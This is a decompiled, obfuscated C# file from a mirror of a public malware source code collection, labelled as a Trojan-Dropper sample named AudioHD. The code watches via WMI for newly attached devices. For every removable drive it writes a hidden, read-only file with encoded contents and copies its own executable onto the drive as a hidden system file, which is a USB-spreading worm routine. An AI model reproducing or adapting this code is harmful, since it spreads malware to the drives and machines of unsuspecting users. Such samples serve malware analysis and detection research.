mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-26 21:35:27 +00:00
94 lines
3.2 KiB
C#
94 lines
3.2 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u000F;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Management;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace \u000F
|
|||
|
{
|
|||
|
internal sealed class \u0005
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
private static ManagementEventWatcher \u0001;
|
|||
|
|
|||
|
public static void \u000F()
|
|||
|
{
|
|||
|
ManagementScope scope = new ManagementScope(\u0005.\u0001(8131));
|
|||
|
scope.Options.EnablePrivileges = true;
|
|||
|
try
|
|||
|
{
|
|||
|
Thread.Sleep(50);
|
|||
|
\u0005.\u0001 = new ManagementEventWatcher(scope, (EventQuery) new WqlEventQuery()
|
|||
|
{
|
|||
|
EventClassName = \u0005.\u0001(8148),
|
|||
|
WithinInterval = new TimeSpan(0, 0, 3),
|
|||
|
Condition = \u0005.\u0001(8181)
|
|||
|
});
|
|||
|
\u0005.\u0001.EventArrived += new EventArrivedEventHandler(\u0005.\u000F);
|
|||
|
\u0005.\u0001.Start();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
if (\u0005.\u0001 == null)
|
|||
|
return;
|
|||
|
\u0005.\u0001.Stop();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void \u000F([In] object obj0, [In] EventArgs obj1)
|
|||
|
{
|
|||
|
foreach (DriveInfo drive in DriveInfo.GetDrives())
|
|||
|
{
|
|||
|
if (drive.DriveType == DriveType.Removable)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Thread.Sleep(50);
|
|||
|
if (File.Exists(drive.Name + \u0005.\u0001(8246)))
|
|||
|
File.Delete(drive.Name + \u0005.\u0001(8246));
|
|||
|
if (File.Exists(drive.Name + \u0005.\u0001(8263)))
|
|||
|
File.Delete(drive.Name + \u0005.\u0001(8263));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
StreamWriter streamWriter = new StreamWriter(drive.Name + \u0005.\u0001(8246));
|
|||
|
streamWriter.WriteLine(\u0005.\u0001(8280));
|
|||
|
streamWriter.WriteLine(\u0005.\u0001(8293));
|
|||
|
streamWriter.WriteLine(\u0005.\u0001(8314));
|
|||
|
streamWriter.WriteLine(\u0005.\u0001(8371));
|
|||
|
streamWriter.WriteLine(\u0005.\u0001(8396));
|
|||
|
streamWriter.WriteLine(\u0005.\u0001(8429));
|
|||
|
streamWriter.Close();
|
|||
|
Thread.Sleep(50);
|
|||
|
File.SetAttributes(drive.Name + \u0005.\u0001(8246), File.GetAttributes(drive.Name + \u0005.\u0001(8246)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly);
|
|||
|
try
|
|||
|
{
|
|||
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, drive.Name + \u0005.\u0001(8263));
|
|||
|
File.SetAttributes(drive.Name + \u0005.\u0001(8263), File.GetAttributes(drive.Name + \u0005.\u0001(8263)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly);
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
Thread.Sleep(2000);
|
|||
|
}
|
|||
|
}
|
|||
|
if (\u0005.\u0001 != null)
|
|||
|
\u0005.\u0001.Stop();
|
|||
|
\u0005.\u0001.Start();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
static \u0005() => \u0003.\u000F();
|
|||
|
}
|
|||
|
}
|